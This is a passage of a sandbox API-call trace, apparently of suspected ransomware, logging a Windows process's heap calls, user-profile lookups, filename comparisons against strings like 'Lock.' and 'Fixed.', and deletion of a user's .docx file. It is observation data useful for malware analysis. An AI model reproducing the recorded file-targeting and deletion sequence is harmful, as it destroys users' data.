hHeap=0x25c0000) returned 1 [0264.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0264.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0264.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0264.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0264.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0264.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0264.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0264.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0264.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0264.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0264.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0264.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0264.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0264.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0264.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0264.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x78) returned 0x24f5278 [0264.074] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/MkMwkg_ip2 n-V.docx", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MkMwkg_ip2 n-V.docx", lpFilePart=0x8bedfc*="MkMwkg_ip2 n-V.docx") returned 0x3b [0264.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0264.074] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MkMwkg_ip2 n-V.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mkmwkg_ip2 n-v.docx")) returned 0x20 [0264.074] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MkMwkg_ip2 n-V.docx", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x617772d0, ftCreationTime.dwHighDateTime=0x1d48989, ftLastAccessTime.dwLowDateTime=0x5d92c9d0, ftLastAccessTime.dwHighDateTime=0x1d4d691, ftLastWriteTime.dwLowDateTime=0x5d92c9d0, ftLastWriteTime.dwHighDateTime=0x1d4d691, nFileSizeHigh=0x0, nFileSizeLow=0x142e4, dwReserved0=0x1cb1, dwReserved1=0x4, cFileName="MkMwkg_ip2 n-V.docx", cAlternateFileName="MKMWKG~1.DOC")) returned 0xaa5860 [0264.074] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MkMwkg_ip2 n-V.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mkmwkg_ip2 n-v.docx")) returned 1 [0264.076] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x617772d0, ftCreationTime.dwHighDateTime=0x1d48989, ftLastAccessTime.dwLowDateTime=0x5d92c9d0, ftLastAccessTime.dwHighDateTime=0x1d4d691, ftLastWriteTime.dwLowDateTime=0x5d92c9d0, ftLastWriteTime.dwHighDateTime=0x1d4d691, nFileSizeHigh=0x0, nFileSizeLow=0x142e4, dwReserved0=0x1cb1, dwReserved1=0x4, cFileName="MkMwkg_ip2 n-V.docx", cAlternateFileName="MKMWKG~1.DOC")) returned 0 [0264.077] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0264.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0264.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0264.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0264.077] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0264.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0264.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0264.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0264.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0264.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0264.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0264.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0264.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0264.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0264.078] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0264.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0264.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0264.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0264.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0264.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0264.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e88 [0264.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0264.079] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0264.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0264.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0264.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0264.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0264.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0264.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0264.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0264.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0264.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0264.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0264.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0264.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0264.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0264.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0264.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0264.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0264.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0264.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0264.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0264.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0264.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0264.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0264.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0264.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0264.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0264.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0264.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0264.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0264.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x78) returned 0x24f5278 [0264.081] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/MkMwkg_ip2 n-V.docx", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MkMwkg_ip2 n-V.docx", lpFilePart=0x8bf658*="MkMwkg_ip2 n-V.docx") returned 0x3b [0264.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0264.081] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MkMwkg_ip2 n-V.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mkmwkg_ip2 n-v.docx")) returned 0xffffffff [0264.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0264.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0264.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0264.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0264.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0264.082] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0264.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0264.082] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0264.082] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0264.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0264.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0264.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0264.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0264.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0264.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0264.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0264.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0264.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0264.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0264.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0264.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0264.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MlLRhGX00a.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0264.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lLRhGX00a.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LRhGX00a.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0264.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RhGX00a.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0264.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hGX00a.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GX00a.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X00a.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0264.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="00a.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0a.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0264.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0264.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0264.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0264.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0264.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0264.083] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0264.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0264.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0264.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0264.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0264.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0264.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0264.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0264.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0264.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0264.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0264.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0264.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0264.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0264.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0264.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0264.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0264.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MlLRhGX00a.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lLRhGX00a.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LRhGX00a.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RhGX00a.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hGX00a.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GX00a.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X00a.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="00a.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0264.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0a.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0264.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0264.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0264.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0264.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0264.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0264.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0264.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0264.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0264.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0264.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0264.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0264.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0264.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0264.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0264.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0264.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0264.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0264.086] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0264.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0264.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0264.086] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0264.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0264.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0264.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0264.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1808 [0264.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0264.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0264.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0264.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0264.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0264.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0264.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0264.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0264.087] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0264.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0264.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0264.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0264.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0264.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0264.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0264.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0264.087] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0264.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0264.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0264.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 